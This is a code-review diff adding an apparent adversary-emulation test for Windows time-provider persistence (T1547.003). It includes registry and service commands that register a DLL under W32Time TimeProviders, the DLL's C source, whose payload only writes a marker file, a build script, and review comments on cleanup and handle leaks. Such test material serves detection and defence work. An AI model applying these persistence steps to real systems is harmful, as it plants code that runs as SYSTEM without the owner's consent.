diff --git a/atomics/T1547.003/T1547.003.yaml b/atomics/T1547.003/T1547.003.yaml
new file mode 100644
index 00000000..e0dedc88
--- /dev/null
+++ b/atomics/T1547.003/T1547.003.yaml
@@ -0,0 +1,52 @@
+attack_technique: T1547.003
+display_name: Time Providers
+atomic_tests:
+- name: Create a new time provider
+
+ description: |
+ Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+ The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+ in C:\Users\Public\ as validation that the test is successful.
+
+ Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
+ net start w32time
+ cleanup_command: |
+ net stop w32time
+ reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
+ rm -force C:\Users\Public\AtomicTest.dll
+ name: powershell
+ elevation_required: true
+
+- name: Edit an existing time provider
+
+ description: |
+ Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+ The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+ in C:\Users\Public\ as validation that the test is successful.
+
+ Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
+ net start w32time
+ cleanup_command: |
+ net stop w32time
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Windows\SYSTEM32\w32time.DLL" /f
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
+ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
+ rm -force C:\Users\Public\AtomicTest.dll
+ name: powershell
+ elevation_required: true
\ No newline at end of file
diff --git a/atomics/T1547.003/bin/AtomicTest.dll b/atomics/T1547.003/bin/AtomicTest.dll
new file mode 100644
index 00000000..a767202b
Binary files /dev/null and b/atomics/T1547.003/bin/AtomicTest.dll differ
diff --git a/atomics/T1547.003/src/AtomicTest.c b/atomics/T1547.003/src/AtomicTest.c
new file mode 100644
index 00000000..a149d5e0
--- /dev/null
+++ b/atomics/T1547.003/src/AtomicTest.c
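Review bot: Neither cleanup_command returns the host to its pre-test state: the first test's cleanup stops w32time and never starts it again, and the second test's cleanup writes fixed values under `NtpServer` (`Enabled`=0, `InputProvider`=0, `DllName`=`C:\Windows\SYSTEM32\w32time.DLL`) that may not be what was there before — on a domain controller, for example, the NtpServer provider is typically enabled. Capture the key before modifying it and restore it afterwards, e.g. `reg export "HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" "$env:TEMP\NtpServer.reg" /y` as the first executor line and `reg import "$env:TEMP\NtpServer.reg"` in cleanup, and end both cleanups with `net start w32time`. The executor's `net start w32time` also fails with "service already started" when w32time is already running, in which case the provider DLL is never loaded; `Restart-Service w32time` (or `net stop w32time` followed by `net start w32time`) guarantees the reload. Both descriptions name the key `...\W32Time\TimeProvider` while the commands use `TimeProviders`; the descriptions should read `TimeProviders`.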
@@ -0,0 +1,65 @@
+/*
+ Atomic Test T1547.003
+
+ Author: traceflow
+ https://github.com/tr4cefl0w
+
+ Credits: https://github.com/scottlundgren/w32time
+ https://pentestlab.blog/2019/10/22/persistence-time-providers/
+
+ Resources: https://docs.microsoft.com/en-us/windows/win32/sysinfo/creating-a-time-provider
+ https://docs.microsoft.com/en-us/windows/win32/sysinfo/sample-time-provider
+*/
+
+
+#include
+#include "timeprov.h"
+
+TimeProvSysCallbacks sc;
+const TimeProvHandle htp = (TimeProvHandle)1;
+TpcGetSamplesArgs Samples;
+DWORD dwPollInterval;
+
+void Run(void) {
+
+ CreateFile("c:\\users\\public\\AtomicTest.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+
+ return;
+
+}
+
+HRESULT CALLBACK TimeProvOpen(WCHAR *wszName, TimeProvSysCallbacks *pSysCallback, TimeProvHandle *phTimeProv) {
+
+ CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Run, 0, 0, 0);
+
+ CopyMemory(&sc, (PVOID)pSysCallback, sizeof(TimeProvSysCallbacks));
+ *phTimeProv = htp;
+
+ return S_OK;
+}
+
+HRESULT CALLBACK TimeProvCommand(TimeProvHandle hTimeProv, TimeProvCmd eCmd, PVOID pvArgs) {
+
+ switch( eCmd ) {
+ case TPC_GetSamples:
+ // Return the Samples structure in pvArgs.
+ CopyMemory(pvArgs, &Samples, sizeof(TpcGetSamplesArgs));
+ break;
+ case TPC_PollIntervalChanged:
+ // Retrieve the new value.
+ sc.pfnGetTimeSysInfo( TSI_PollInterval, &dwPollInterval );
+ break;
+ case TPC_TimeJumped:
+ // Discard samples saved in the Samples structure.
+ ZeroMemory(&Samples, sizeof(TpcGetSamplesArgs));
+ break;
+ case TPC_UpdateConfig:
+ // Read the configuration sirmation from the registry.
+ break;
+ }
+ return S_OK;
+}
+
+HRESULT CALLBACK TimeProvClose(TimeProvHandle hTimeProv) {
+ return S_OK;
+}
\ No newline at end of file
diff --git a/atomics/T1547.003/src/AtomicTest.def b/atomics/T1547.003/src/AtomicTest.def
new file mode 100644
index 00000000..e3f8c293
--- /dev/null
+++ b/atomics/T1547.003/src/AtomicTest.def
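Review bot: `Run` is declared `void Run(void)` and then cast to `LPTHREAD_START_ROUTINE` in `TimeProvOpen`, which hides a signature mismatch — a thread routine is `DWORD WINAPI fn(LPVOID)`, so the thread's exit code is whatever is left in the return register, and on 32-bit builds the cast also papers over a cdecl/stdcall mismatch. Both handles the DLL creates are leaked inside the SYSTEM-level w32time service process: the `HANDLE` from `CreateFile` is discarded, so AtomicTest.txt stays open for the life of the service, and the thread handle from `CreateThread` is never closed. Give `Run` the proper prototype so the cast can go, check `CreateFile` against `INVALID_HANDLE_VALUE`, and close both handles; the rest of `TimeProvOpen` can stay as is. Separately, the `TPC_UpdateConfig` comment reads `sirmation`, presumably a typo for `information`, and the `switch` has no `default:` for commands such as `TPC_Query`/`TPC_Shutdown` — harmless since `S_OK` is returned either way, but a `default: break;` makes that intent explicit.
```c
static DWORD WINAPI Run(LPVOID unused) {
    HANDLE hFile;
    (void)unused;
    hFile = CreateFile("c:\\users\\public\\AtomicTest.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile != INVALID_HANDLE_VALUE) {
        CloseHandle(hFile);
    }
    return 0;
}

HRESULT CALLBACK TimeProvOpen(WCHAR *wszName, TimeProvSysCallbacks *pSysCallback, TimeProvHandle *phTimeProv) {
    HANDLE hThread = CreateThread(NULL, 0, Run, NULL, 0, NULL);
    if (hThread != NULL) {
        CloseHandle(hThread); /* thread keeps running; only our reference is dropped */
    }
    /* … unchanged: CopyMemory into sc, *phTimeProv = htp, return S_OK … */
}
```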
@@ -0,0 +1,5 @@
+LIBRARY
+EXPORTS
+ TimeProvOpen
+ TimeProvCommand
+ TimeProvClose
\ No newline at end of file
diff --git a/atomics/T1547.003/src/build.bat b/atomics/T1547.003/src/build.bat
new file mode 100644
index 00000000..e87c0a8c
--- /dev/null
+++ b/atomics/T1547.003/src/build.bat
@@ -0,0 +1 @@
+cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll
\ No newline at end of file
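Review bot: `/W0` switches off every compiler warning, so problems in AtomicTest.c such as the unreferenced `wszName`, `hTimeProv` and `pvArgs` parameters never surface to whoever rebuilds the DLL; `/W4` (or at least the default `/W3`) should be used instead, e.g. `cl.exe /W4 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll`. Because the prebuilt `bin/AtomicTest.dll` is committed in the same change, this one-line script is the only thing a reviewer has to confirm that the binary corresponds to the source, so it would help to record the `cl.exe` and Windows SDK versions used (a `REM` line is enough) so the build can be reproduced and compared.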